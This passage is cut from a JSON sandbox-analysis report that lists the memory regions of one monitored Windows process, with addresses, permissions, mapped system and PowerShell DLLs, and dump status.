"info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_300", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_1127", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:00:56.109", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1966866432, "type": "region", "version": 1 }, "end_va": 1966903295, "entry_point": 1966871870, "filename": "\\Windows\\SysWOW64\\linkinfo.dll", "id": "region_1128", "name": "linkinfo.dll", "norm_filename": "c:\\windows\\syswow64\\linkinfo.dll", "region_type": "memory_mapped_file", "start_va": 1966866432, "timestamp": "00:00:56.173", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 1851391, "entry_point": 1835008, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1129", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 1835008, "timestamp": "00:00:56.190", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3686399, "entry_point": 3670016, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1130", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 3670016, "timestamp": "00:00:56.192", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4456447, "entry_point": 4259840, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db", "id": "region_1131", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000a.db", "region_type": "memory_mapped_file", "start_va": 4259840, "timestamp": "00:00:56.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5201919, "entry_point": 4784128, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1132", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 4784128, "timestamp": "00:00:56.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 458752, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966866431, "entry_point": 1966415717, "filename": "\\Windows\\SysWOW64\\ntshrui.dll", "id": "region_1133", "name": "ntshrui.dll", "norm_filename": "c:\\windows\\syswow64\\ntshrui.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:00:56.193", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_1134", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:00:56.195", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001135-addr_0x0000000002790000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 41746431, "entry_point": 0, "filename": null, "id": "region_1135", "name": "private_0x0000000002790000", "norm_filename": null, "region_type": "private_memory", "start_va": 41484288, "timestamp": "00:00:56.199", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001136-addr_0x00000000028c0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 42729472, "type": "region", "version": 1 }, "end_va": 42991615, "entry_point": 0, "filename": null, "id": "region_1136", "name": "private_0x00000000028c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 42729472, "timestamp": "00:00:56.199", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966256127, "entry_point": 1966215680, "filename": "\\Windows\\SysWOW64\\cscapi.dll", "id": "region_1137", "name": "cscapi.dll", "norm_filename": "c:\\windows\\syswow64\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:00:56.199", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001138-addr_0x000000007efad000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_303", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_1138", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:00:56.200", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1966145536, "type": "region", "version": 1 }, "end_va": 1966186495, "entry_point": 1966165280, "filename": "\\Windows\\SysWOW64\\slc.dll", "id": "region_1139", "name": "slc.dll", "norm_filename": "c:\\windows\\syswow64\\slc.dll", "region_type": "memory_mapped_file", "start_va": 1966145536, "timestamp": "00:00:56.201", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_1140", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:00:56.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_1141", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:00:56.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 499712, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1948426239, "entry_point": 1947934536, "filename": "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll", "id": "region_1142", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:00:56.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 4460543, "entry_point": 0, "filename": null, "id": "region_1143", "name": "pagefile_0x0000000000440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4456448, "timestamp": "00:00:56.259", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001144-addr_0x0000000002a80000-size_0x0000000000040000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_304", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 44826623, "entry_point": 0, "filename": null, "id": "region_1144", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:00:56.259", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001145-addr_0x0000000002c50000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 46465024, "type": "region", "version": 1 }, "end_va": 46530559, "entry_point": 0, "filename": null, "id": "region_1145", "name": "private_0x0000000002c50000", "norm_filename": null, "region_type": "private_memory", "start_va": 46465024, "timestamp": "00:00:56.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5943296, "start_va": 1852243968, "type": "region", "version": 1 }, "end_va": 1858187263, "entry_point": 1852587456, "filename": "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll", "id": "region_1146", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 1852243968, "timestamp": "00:00:56.260", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 634880, "start_va": 1953366016, "type": "region", "version": 1 }, "end_va": 1954000895, "entry_point": 1953375019, "filename": "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "id": "region_1147", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1953366016, "timestamp": "00:00:56.261", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 5246975, "entry_point": 0, "filename": null, "id": "region_1148", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:00:56.351", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5312511, "entry_point": 0, "filename": null, "id": "region_1149", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:00:56.351", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001150-addr_0x0000000000520000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_306", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_1150", "name": "private_0x0000000000520000", "norm_filename": null, "region_type": "private_memory", "start_va": 5373952, "timestamp": "00:00:56.351", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001151-addr_0x0000000000570000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_307", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5701632, "type": "region", "version": 1 }, "end_va": 5767167, "entry_point": 0, "filename": null, "id": "region_1151", "name": "private_0x0000000000570000", "norm_filename": null, "region_type": "private_memory", "start_va": 5701632, "timestamp": "00:00:56.352", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001152-addr_0x0000000001ea0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_308", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32178175, "entry_point": 0, "filename": null, "id": "region_1152", "name": "private_0x0000000001ea0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32112640, "timestamp": "00:00:56.352", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001153-addr_0x0000000001eb0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_309", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32178176, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_1153", "name": "private_0x0000000001eb0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32178176, "timestamp": "00:00:56.352", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001154-addr_0x0000000001ec0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_310", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32309247, "entry_point": 0, "filename": null, "id": "region_1154", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:00:56.353", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001155-addr_0x0000000001ed0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_311", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 32309248, "type": "region", "version": 1 }, "end_va": 32374783, "entry_point": 0, "filename": null, "id": "region_1155", "name": "private_0x0000000001ed0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32309248, "timestamp": "00:00:56.353", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001156-addr_0x0000000002630000-size_0x00000000000a0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_312", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 40042496, "type": "region", "version": 1 }, "end_va": 40697855, "entry_point": 0, "filename": null, "id": "region_1156", "name": "private_0x0000000002630000", "norm_filename": null, "region_type": "private_memory", "start_va": 40042496, "timestamp": "00:00:56.354", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001157-addr_0x0000000002850000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_313", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 42270720, "type": "region", "version": 1 }, "end_va": 42532863, "entry_point": 0, "filename": null, "id": "region_1157", "name": "private_0x0000000002850000", "norm_filename": null, "region_type": "private_memory", "start_va": 42270720, "timestamp": "00:00:56.354", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001158-addr_0x0000000002920000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_314", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 43122688, "type": "region", "version": 1 }, "end_va": 43384831, "entry_point": 0, "filename": null, "id": "region_1158", "name": "private_0x0000000002920000", "norm_filename": null, "region_type": "private_memory", "start_va": 43122688, "timestamp": "00:00:56.354", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001159-addr_0x0000000002990000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_315", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 43581440, "type": "region", "version": 1 }, "end_va": 43843583, "entry_point": 0, "filename": null, "id": "region_1159", "name": "private_0x0000000002990000", "norm_filename": null, "region_type": "private_memory", "start_va": 43581440, "timestamp": "00:00:56.355", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001160-addr_0x0000000002a10000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_316", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 44105728, "type": "region", "version": 1 }, "end_va": 44367871, "entry_point": 0, "filename": null, "id": "region_1160", "name": "private_0x0000000002a10000", "norm_filename": null, "region_type": "private_memory", "start_va": 44105728, "timestamp": "00:00:56.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 33554432, "start_va": 46530560, "type": "region", "version": 1 }, "end_va": 80084991, "entry_point": 0, "filename": null, "id": "region_1161", "name": "private_0x0000000002c60000", "norm_filename": null, "region_type": "private_memory", "start_va": 46530560, "timestamp": "00:00:56.356", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 11501568, "start_va": 1840709632, "type": "region", "version": 1 }, "end_va": 1852211199, "entry_point": 1840709632, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "id": "region_1162", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 1840709632, "timestamp": "00:00:56.356", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001163-addr_0x000000007efa7000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_317", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130341888, "type": "region", "version": 1 }, "end_va": 2130354175, "entry_point": 0, "filename": null, "id": "region_1163", "name": "private_0x000000007efa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130341888, "timestamp": "00:00:56.358", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001164-addr_0x000000007efaa000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_318", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_1164", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:00:56.358", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001165-addr_0x00000000026d0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_319", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 40763391, "entry_point": 0, "filename": null, "id": "region_1165", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:00:56.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 80084992, "type": "region", "version": 1 }, "end_va": 83107839, "entry_point": 82766878, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1166", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 80084992, "timestamp": "00:00:56.600", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 528384, "start_va": 1832124416, "type": "region", "version": 1 }, "end_va": 1832652799, "entry_point": 1832124416, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1167", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 1832124416, "timestamp": "00:00:56.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 7979008, "start_va": 1832714240, "type": "region", "version": 1 }, "end_va": 1840693247, "entry_point": 1832714240, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll", "id": "region_1168", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 1832714240, "timestamp": "00:00:56.602", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 8888320, "start_va": 1820131328, "type": "region", "version": 1 }, "end_va": 1829019647, "entry_point": 1820131328, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll", "id": "region_1169", "name": "system.management.automation.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll", "region_type": "memory_mapped_file", "start_va": 1820131328, "timestamp": "00:00:56.680", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_1170", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:00:56.698", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 1829044224, "type": "region", "version": 1 }, "end_va": 1832067071, "entry_point": 1831726110, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1171", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 1829044224, "timestamp": "00:00:56.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 40763392, "type": "region", "version": 1 }, "end_va": 40775679, "entry_point": 40763392, "filename": "\\Windows\\SysWOW64\\l_intl.nls", "id": "region_1173", "name": "l_intl.nls", "norm_filename": "c:\\windows\\syswow64\\l_intl.nls", "region_type": "memory_mapped_file", "start_va": 40763392, "timestamp": "00:00:56.714", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 44826624, "type": "region", "version": 1 }, "end_va": 45613055, "entry_point": 44826624, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_1174", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 44826624, "timestamp": "00:00:56.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2005336064, "type": "region", "version": 1 }, "end_va": 2005356543, "entry_point": 2005341240, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_1175", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2005336064, "timestamp": "00:00:56.736", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000006-region_00001176-addr_0x00000000026f0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_320", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 40828928, "type": "region", "version": 1 }, "end_va": 40833023, "entry_point": 0, "filename": null, "id": "region_1176", "name": "private_0x00000000026f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40828928, "timestamp": "00:00:56.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20480, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 40914943, "entry_point": 40894464, "filename": "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "id": "region_1177", "name": "sorttbls.nlp", "norm_filename": "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp", "region_type": "memory_mapped_file", "start_va": 40894464, "timestamp": "00:00:56.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 266240, "start_va": 41746432, "type": "region", "version": 1 }, "end_va": 42012671, "entry_point": 41746432, "filename": 